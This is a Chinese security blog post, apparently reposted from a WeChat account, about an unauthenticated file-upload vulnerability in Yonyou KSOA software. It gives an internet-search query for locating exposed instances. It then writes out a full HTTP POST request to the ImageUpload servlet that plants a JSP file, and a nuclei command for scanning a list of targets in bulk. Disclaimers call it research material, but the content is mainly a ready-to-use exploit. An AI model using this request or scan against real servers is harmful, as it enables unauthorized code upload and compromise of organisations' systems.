用友时空KSOA软件前台文件上传漏洞 nuclei

admin
admin
admin
138954
文章
114
评论
2022年10月5日16:18:03评论1,487 views字数 1016阅读3分23秒阅读模式
用友时空KSOA软件前台文件上传漏洞 nuclei
文章声明

安全文章技术仅供参考,此文所提供的信息为漏洞靶场进行渗透,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。
本文所提供的工具仅用于学习,禁止用于其他,未经授权,严禁转载,如需转载私信联系。



用友时空KSOA软件前台文件上传漏洞 nuclei


文章简介


用友时空KSOA是建立在SOA理念指导下研发的新一代产品,是根据流通企业前沿的IT需求推出的统一的IT基础架构,它可以让流通企业各个时期建立的IT系统之间彼此轻松对话,帮助流通企业保护原有的IT投资,简化IT管理,提升竞争能力,确保企业整体的战略目标以及创新活动的实现。



网络测绘

app="用友-时空KSOA"


复现过程

用友时空KSOA软件前台文件上传漏洞 nuclei

POST http://ip:port/servlet/com.sksoft.bill.ImageUpload?filepath=/&filename=111111.jsp&_ZQA_ID=d0d60ec54924481c HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateContent-Type: multipart/form-data; boundary=---------------------------122739796041499160471980406311Content-Length: 51Origin: nullConnection: closeUpgrade-Insecure-Requests: 1
<% out.println("bea86d66a5278f9e6fa1112d2e2f1"); %>


用友时空KSOA软件前台文件上传漏洞 nuclei

用友时空KSOA软件前台文件上传漏洞 nuclei




接下来就是漫长的信息收集阶段:





内网nuclei-pocs方法


nuclei -t yonyou_KSOA_ImageUpload_rce.yaml -l url.txt

公众号回复0931获取

用友时空KSOA软件前台文件上传漏洞 nuclei






用友时空KSOA软件前台文件上传漏洞 nuclei




用友时空KSOA软件前台文件上传漏洞 nuclei

用友时空KSOA软件前台文件上传漏洞 nuclei

用友时空KSOA软件前台文件上传漏洞 nuclei



原文始发于微信公众号(北极星sec):用友时空KSOA软件前台文件上传漏洞 nuclei

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年10月5日16:18:03
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   用友时空KSOA软件前台文件上传漏洞 nucleihttps://cn-sec.com/archives/1329088.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息